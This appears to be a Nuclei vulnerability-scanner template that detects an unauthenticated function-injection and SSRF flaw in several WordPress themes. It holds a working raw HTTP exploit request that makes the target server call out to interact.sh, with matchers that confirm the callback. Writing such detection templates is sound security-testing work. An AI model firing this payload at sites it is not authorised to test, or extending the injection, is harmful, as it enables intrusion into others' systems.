id: wp-multiple-theme-ssrf info: name: WordPress Multiple Themes - Unauthenticated Function Injection author: madrobot severity: high reference: - https://www.exploit-db.com/exploits/49327 - https://wpscan.com/vulnerability/10417 tags: wordpress,rce,ssrf requests: - raw: - | POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://interact.sh matchers-condition: and matchers: - type: word part: body words: - "Interactsh Server" - "protocol_version" - type: status status: - 200